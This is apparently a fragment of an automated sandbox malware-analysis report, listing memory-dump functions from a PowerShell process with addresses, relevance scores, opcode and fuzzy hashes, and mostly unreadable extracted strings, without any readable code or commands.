                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: 3d1f88a651d3f25652d874fa01a4fac3541f9dc295a6e87dc43fecb094f9b772
                                                                        • Instruction ID: 2407f22c98986af5dc15050b056ca31b1b6fa0a38744154ba570abf2cff6ef3b
                                                                        • Opcode Fuzzy Hash: 3d1f88a651d3f25652d874fa01a4fac3541f9dc295a6e87dc43fecb094f9b772
                                                                        • Instruction Fuzzy Hash: 6C5168F17142068FCB249B78875466B7BE6AF82384B1488B5D6518F366DA35C842C7A3
                                                                        Function 077F5000 Relevance: 2.0, Strings: 1, Instructions: 775COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q
                                                                        • API String ID: 0-1259897404
                                                                        • Opcode ID: aa1d9dfd551525369b872ec5274d23ef20d5d7c467619468ec0b3a42258412da
                                                                        • Instruction ID: fc52ab2a38f151910b9e84f49f7614286840a0715d5c183e6fe2b0d8b1bc7c3d
                                                                        • Opcode Fuzzy Hash: aa1d9dfd551525369b872ec5274d23ef20d5d7c467619468ec0b3a42258412da
                                                                        • Instruction Fuzzy Hash: 24726CB4A00215DFD724CB18C980FA9BBB2BF85714F14C599DA09AB352DB72DD82CF91
                                                                        Function 04902F50 Relevance: 1.8, Strings: 1, Instructions: 532COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: W
                                                                        • API String ID: 0-655174618
                                                                        • Opcode ID: 2e141a074d0cbac2c508cb9f7f3c34ace8ce8877987048648332a04e1d41833d
                                                                        • Instruction ID: dc9cda6441bfc85397b6401103c82e3292b175ebb0891d9d9e0bb866e39de479
                                                                        • Opcode Fuzzy Hash: 2e141a074d0cbac2c508cb9f7f3c34ace8ce8877987048648332a04e1d41833d
                                                                        • Instruction Fuzzy Hash: 3D224C74A012099FCB15CF98C594AAEFBB2FF89310F25C569E815AB3A5C731ED41CB90
                                                                        Function 077F5C22 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q
                                                                        • API String ID: 0-1259897404
                                                                        • Opcode ID: 92f79cca98353c85cc2c038b2d49f21c72b20c44b41b9666347409a1cf193638
                                                                        • Instruction ID: 37c60a981af50eb524bdb0d202f362094f8fcd37170984e6188271ab2be777a6
                                                                        • Opcode Fuzzy Hash: 92f79cca98353c85cc2c038b2d49f21c72b20c44b41b9666347409a1cf193638
                                                                        • Instruction Fuzzy Hash: E8225BB4A00215DFDB24CB18CA81FA9BBB2FB85714F14C495DA09AB352DB72DD81CF91
                                                                        Function 049039B0 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: W
                                                                        • API String ID: 0-655174618
                                                                        • Opcode ID: 5a6d3e603f341879be6c04ae842c938f8053379d270c07d3f0935d7a80fe0cd1
                                                                        • Instruction ID: 14de9424d7f480d9130ce986c8f5fbd77425d42c052fff9c0e3bf5a366fa4616
                                                                        • Opcode Fuzzy Hash: 5a6d3e603f341879be6c04ae842c938f8053379d270c07d3f0935d7a80fe0cd1
                                                                        • Instruction Fuzzy Hash: E2D10634A00219EFDB14CF98D584AADBBB6FF88314F24C569E805AB365C731ED81CB90
                                                                        Function 077F8D9C Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q
                                                                        • API String ID: 0-1259897404
                                                                        • Opcode ID: 6ce4bae1534f91053ac53fbdaf5a41c6dcff87fddbeab60cbb185107a10967ae
                                                                        • Instruction ID: 44ff657bfd799e168e3f2984e6f5ef90d6fbb698fe04f0cf3f91705f661c72e3
                                                                        • Opcode Fuzzy Hash: 6ce4bae1534f91053ac53fbdaf5a41c6dcff87fddbeab60cbb185107a10967ae
                                                                        • Instruction Fuzzy Hash: 2B4105F0B04202DFCB248F68C750B697BE2AF92794F184865DA018B391D736DA81C7A3
                                                                        Function 04903985 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: W
                                                                        • API String ID: 0-655174618
                                                                        • Opcode ID: ee9f472a4f20c89c9b3c2ba5310e5d7b8f81a0606a02b65b9db6807a7306f138
                                                                        • Instruction ID: 26dd153c6ccc643842fe31a5c09d4f059f681c65e5bff67a411ce2307fbb053f
                                                                        • Opcode Fuzzy Hash: ee9f472a4f20c89c9b3c2ba5310e5d7b8f81a0606a02b65b9db6807a7306f138
                                                                        • Instruction Fuzzy Hash: 71315E74A04646DFCB15CF5CC9909AAFBB1FF49310B1585AAD848EBB61C735EC41CBA0
                                                                        Function 04904A88 Relevance: .3, Instructions: 331COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15c013569e07c64ece326845a497ce7238ddc6ea2f77fef38f25cb3257ec4b3f
                                                                        • Instruction ID: f09d2b8ef22a5bf2a2ef64e5a09e00d3378bc9e466a693aa95706e757d18fceb
                                                                        • Opcode Fuzzy Hash: 15c013569e07c64ece326845a497ce7238ddc6ea2f77fef38f25cb3257ec4b3f
                                                                        • Instruction Fuzzy Hash: 6CD11974A00219AFDB04CF98D584A9DFBB6FF88310F14C569E905AB3A5D735ED81CB90
                                                                        Function 04909180 Relevance: .3, Instructions: 322COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23b82a41606c758ffbc1ade79c7f35784e6045a6fa2cf2be7b0a0e298176b7aa
                                                                        • Instruction ID: df6982099efe53a634b36304c2eb526efa606ce03c29596d74a9260f9e969129
                                                                        • Opcode Fuzzy Hash: 23b82a41606c758ffbc1ade79c7f35784e6045a6fa2cf2be7b0a0e298176b7aa
                                                                        • Instruction Fuzzy Hash: 1BC18F71A00208DFDB14DFA8D584A9DBBF6FF85310F158569E406AF2A6DB34ED49CB80
                                                                        Function 0490EDE4 Relevance: .3, Instructions: 278COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5d5323d5e007b5058eb829263407973b346fe24d92777eb387cec65cf7885205
                                                                        • Instruction ID: e66a70fb9ca0ba772c87d56663503025cc08b0ef41b8e7f4c8734b58f4fee60e
                                                                        • Opcode Fuzzy Hash: 5d5323d5e007b5058eb829263407973b346fe24d92777eb387cec65cf7885205
                                                                        • Instruction Fuzzy Hash: 6BB14E70E00209DFDF20CFA8D98579EBBF6AF88314F14C539E415A7294EB74A945CB91
                                                                        Function 0490F6B5 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9d10f2d0d28fa771abac987d541e0028195fc898f21d21ee39d6dadba9ee941
                                                                        • Instruction ID: fab3b5be6c404d98ba6dd77a3332bfb564fc57b070db00056d509c9ef4e7aa87
                                                                        • Opcode Fuzzy Hash: d9d10f2d0d28fa771abac987d541e0028195fc898f21d21ee39d6dadba9ee941
                                                                        • Instruction Fuzzy Hash: 7AB14071E00209DFDB20CFA8D9857DDBBF5AF88318F14C539D815A7298EBB4A945CB81
                                                                        Function 077F6040 Relevance: .2, Instructions: 247COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00d58059259bf99d1c44697104e3dd5dfa7a5728bfcdadfa972da67085391d82
                                                                        • Instruction ID: ad2af3b81cbb38dea5caab9b840fd10c8d8c1fbe9744ca8cb526e0cc10562fdf
                                                                        • Opcode Fuzzy Hash: 00d58059259bf99d1c44697104e3dd5dfa7a5728bfcdadfa972da67085391d82
                                                                        • Instruction Fuzzy Hash: 3F91A3B4B00204AFD714DF64CA55BAEBBE6EF89354F108864DA01AF395CB76EC41CB91
                                                                        Function 077F6018 Relevance: .2, Instructions: 236COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fce6e47edab47b01c575b439183b12f6dbee60883045394be00e7dde75f0854c
                                                                        • Instruction ID: 529dc50b4810a8da12c70bd1900c7fd8fdcd689569d66427d02236c0f2ab82c6
                                                                        • Opcode Fuzzy Hash: fce6e47edab47b01c575b439183b12f6dbee60883045394be00e7dde75f0854c
                                                                        • Instruction Fuzzy Hash: 8491B3F4A00201AFD714CF64CA45B9EBBF2EF89354F148865DA05AF392CB76AC41CB91
                                                                        Function 049089E8 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ebc64c4420d4b5f88d9eeaf0f9e5d7df7fdb9e77137beb62f9ff2a0ed3a0328
                                                                        • Instruction ID: a7569d36236b55c1ba6f9a23725674e8087d04813dde2794f784748b6966aefd
                                                                        • Opcode Fuzzy Hash: 4ebc64c4420d4b5f88d9eeaf0f9e5d7df7fdb9e77137beb62f9ff2a0ed3a0328
                                                                        • Instruction Fuzzy Hash: 32716A34A05244DFCB15DFA8D4849ADBBF6FF89314F1584B9E405AB3A2CB35E885CB50
                                                                        Function 04909948 Relevance: .2, Instructions: 192COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e593febdc651f17486ecee5aed58d89fc06458d88a70cea103f0f1984e02900b
                                                                        • Instruction ID: 656bc5120f6e509d395a9503ffc69af5650cd4741657e45f30c172ca78e1c318
                                                                        • Opcode Fuzzy Hash: e593febdc651f17486ecee5aed58d89fc06458d88a70cea103f0f1984e02900b
                                                                        • Instruction Fuzzy Hash: D3718D70A00249CFCB14DF68D480A9DBBF6FF85314F15C569E41ADB6A2DB75AC46CB80
                                                                        Function 04909AB6 Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f5f7d8ee169006fcc393dc203ac36155bb4b97434efedeed2a99fe29d44e278
                                                                        • Instruction ID: f3a1d6e652647e264d7a2dbeb4a0bea5bb1b0659c0eb38062c60f102907e2361
                                                                        • Opcode Fuzzy Hash: 3f5f7d8ee169006fcc393dc203ac36155bb4b97434efedeed2a99fe29d44e278
                                                                        • Instruction Fuzzy Hash: 9D714A70E00218DFDF14DFA4D580AADBBF6FF89304F148429D416AB2A1DB75AD8ACB41
                                                                        Function 0490F42C Relevance: .2, Instructions: 182COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4e93adc119ca32eaf2c0dc188525a9e03233373a9694c3a7e23073d87506aed
                                                                        • Instruction ID: b07cd1e303d28793a6f93dfd434c13fc7932f35801252dbc4156ee0f9da72803
                                                                        • Opcode Fuzzy Hash: d4e93adc119ca32eaf2c0dc188525a9e03233373a9694c3a7e23073d87506aed
                                                                        • Instruction Fuzzy Hash: 07716E70D00209DFDF20CFA8C84579EBBF5AF88714F14C129D415A7298EBB4A945CF95
                                                                        Function 0490F438 Relevance: .2, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 803889b19b8f1d094dfd9ec3ea36ba27d17de4b5d575249eef329a1e476a27cf
                                                                        • Instruction ID: 5b0829713c21535a46f9435f86f517c08e20d511eac9a79a051513337aff8fe4
                                                                        • Opcode Fuzzy Hash: 803889b19b8f1d094dfd9ec3ea36ba27d17de4b5d575249eef329a1e476a27cf
                                                                        • Instruction Fuzzy Hash: E2716D70E00209DFDF20CFA9C8457AEBBF6AF88714F14C529D415A7298EBB4A941CF85
                                                                        Function 077FA5AC Relevance: .1, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a09c9489388f54ffe3e2dc8c573f4638aa3c2210a38e7ff2511a4ee14aeea940
                                                                        • Instruction ID: 3eba80f205912d8356b4ec92d3138f309acbe1f8d1312eb428aca74de75b80d5
                                                                        • Opcode Fuzzy Hash: a09c9489388f54ffe3e2dc8c573f4638aa3c2210a38e7ff2511a4ee14aeea940
                                                                        • Instruction Fuzzy Hash: C441E5F0A14302DFCB258F248751E697BF6AF87694F16C896D6089F351D631E842C7B1
                                                                        Function 04909933 Relevance: .1, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba5622c3341d362ad6679680330622062f2239d95e65da0c7c87f4b838db9131
                                                                        • Instruction ID: 19cc08d2f7bead38689a5be1927293bf1b394b46cf084a033f840fff9bc58d6c
                                                                        • Opcode Fuzzy Hash: ba5622c3341d362ad6679680330622062f2239d95e65da0c7c87f4b838db9131
                                                                        • Instruction Fuzzy Hash: 27416C70A00218DFCB18DFA9C884AADBBF6FF85310F15853DD006AB6A5DB74AC85CB40
                                                                        Function 04903060 Relevance: .1, Instructions: 112COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f539af5f3a9698f9e0dfa917660331273f34f387e164c70b7829ef263f2a595f
                                                                        • Instruction ID: 063e18e85c0174c9e5c4b5e7a357896ed78351574d92034b8ffeba194cba14d6
                                                                        • Opcode Fuzzy Hash: f539af5f3a9698f9e0dfa917660331273f34f387e164c70b7829ef263f2a595f
                                                                        • Instruction Fuzzy Hash: A2410674A00505AFCB19CF58C594DAAFBB2FF48310B1586A9D915AB3A4C732FC90CBA4
                                                                        Function 077F729E Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e7cc0e6be097f939ecef2bbe719ac2ec21b6c1077ca417127329434dd2b627cb
                                                                        • Instruction ID: e5f99ecd382c5aa0e79b8a49e879ece4246dedfe2891b8ec0592452503dad149
                                                                        • Opcode Fuzzy Hash: e7cc0e6be097f939ecef2bbe719ac2ec21b6c1077ca417127329434dd2b627cb
                                                                        • Instruction Fuzzy Hash: 983107B4750204AFD7089B64CA55BAE7AA7EF85344F14C424ED016F391CF769C438BE1
                                                                        Function 077F0E18 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09705047425721f3974e53b2ac3fcc9c1572d6733241a0f5ff887a60b5ce3d25
                                                                        • Instruction ID: 233bbc3ba842d04db6db40d3ee11e573ca246a49fe9b36226e5279528a3d6e39
                                                                        • Opcode Fuzzy Hash: 09705047425721f3974e53b2ac3fcc9c1572d6733241a0f5ff887a60b5ce3d25
                                                                        • Instruction Fuzzy Hash: BC217EB1300309ABD7246A7E8550737BAD5ABC5B41F148C39D646D7382DE75C841C371
                                                                        Function 0490C3B8 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de584391ac6595e3d65d2b8e7cceda97d8d68e77900dab73d7ff91be81da1f0d
                                                                        • Instruction ID: 32a6b0df755778a38e20b8ac92312ce40ebab42d54e6f5100b827baf4e81c3b9
                                                                        • Opcode Fuzzy Hash: de584391ac6595e3d65d2b8e7cceda97d8d68e77900dab73d7ff91be81da1f0d
                                                                        • Instruction Fuzzy Hash: 44314134B012588FCB29DB64C8946EEB7B2BF89305F1485E9D509AB391CF359E85CF81
                                                                        Function 077F0DFC Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 85236f167dac02cb244bf006d11f84b2f7c7a86288d648ed333c85fff6773400
                                                                        • Instruction ID: eb37b7c1bc9c748b8ea5464a09334fd5b13de6989fa47017102615dfd8222fca
                                                                        • Opcode Fuzzy Hash: 85236f167dac02cb244bf006d11f84b2f7c7a86288d648ed333c85fff6773400
                                                                        • Instruction Fuzzy Hash: F821E1B13043496FD7241A7A8A507767FE59F86B50F184C25D650CB3E2CA75CD41C330
                                                                        Function 04904A7A Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f61080649c1fb2edc62f4ca8fe65631d78586b536d586b00fbcdd101136eddd
                                                                        • Instruction ID: 7cdd061d6be628f674cb4c1771182d4f96287f7d0a3a2fd2378db3c082797f66
                                                                        • Opcode Fuzzy Hash: 4f61080649c1fb2edc62f4ca8fe65631d78586b536d586b00fbcdd101136eddd
                                                                        • Instruction Fuzzy Hash: 5F21F374A002099FCB04DF99C980AAEBBB5FF49310B1585A9E909AB761C731FC51CBA0
                                                                        Function 077F0C08 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e76149237316bbf53672651dcabfb443f7c23368f1351b48965a7052e23ab343
                                                                        • Instruction ID: 094aeae2447bc15f6fcde9ddfc055c64d93bee7b40fe7fa4882dfd37feca407a
                                                                        • Opcode Fuzzy Hash: e76149237316bbf53672651dcabfb443f7c23368f1351b48965a7052e23ab343
                                                                        • Instruction Fuzzy Hash: 9E017B7630031A8BC7245D6AD5001BAF7DADFC1662F14C83FDA49C7312DA32C805C760
                                                                        Function 0490F0DB Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: feb5c07984fdebb95cdd5795ed344010b3811414353d20e4a121f495f347ac73
                                                                        • Instruction ID: 2271c9bea15f127ae29d2ccb1b471d38375bb493ef36d24d54202082f4ac3a9c
                                                                        • Opcode Fuzzy Hash: feb5c07984fdebb95cdd5795ed344010b3811414353d20e4a121f495f347ac73
                                                                        • Instruction Fuzzy Hash: FD11A430D04148DFEF74DA94E998BECB775AB8531DF14943AC001B61D4EBB46ACACB16

                                                                        Non-executed Functions

                                                                        Function 077F8880 Relevance: 17.9, Strings: 14, Instructions: 396COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-344283158
                                                                        • Opcode ID: 286cda9c90a619f08855ad16e6887266a51ee7b87a2fda058bdb93c8bb23bcf7
                                                                        • Instruction ID: c70d793b537b558029ffa0cc58f5fa95f7bd55df30b919891000a5c0f0c75d55
                                                                        • Opcode Fuzzy Hash: 286cda9c90a619f08855ad16e6887266a51ee7b87a2fda058bdb93c8bb23bcf7
                                                                        • Instruction Fuzzy Hash: E0D169B17043069FCB248F69CA5067ABBE6EFC6390F14886BDA558B351CB35D841C7A3
                                                                        Function 077FD78D Relevance: 14.0, Strings: 11, Instructions: 286COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                                                        • API String ID: 0-3029092631
                                                                        • Opcode ID: dc0d0ed3a62a0495b8e42b64d244e2d89e8f74d5e5ad4552f422a03cd393b882
                                                                        • Instruction ID: 83856289e741a1804008bef05778e10d0c8b7d18fd24765002f883eeb206efb9
                                                                        • Opcode Fuzzy Hash: dc0d0ed3a62a0495b8e42b64d244e2d89e8f74d5e5ad4552f422a03cd393b882
                                                                        • Instruction Fuzzy Hash: 7CA1F9B1700206DFCB34DF68C660AAABBE6EF89350F148869DA455F395CB35DC41C7A1
                                                                        Function 077F2548 Relevance: 12.8, Strings: 10, Instructions: 304COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-267665775
                                                                        • Opcode ID: 911b2454e45effd691bb831b54e1d8edc426dc0ca19c31ae6d3a35106143e7f5
                                                                        • Instruction ID: 4b76463052fca42a57856d26087f979f256f4d9ff9a59474221d556518b1cb22
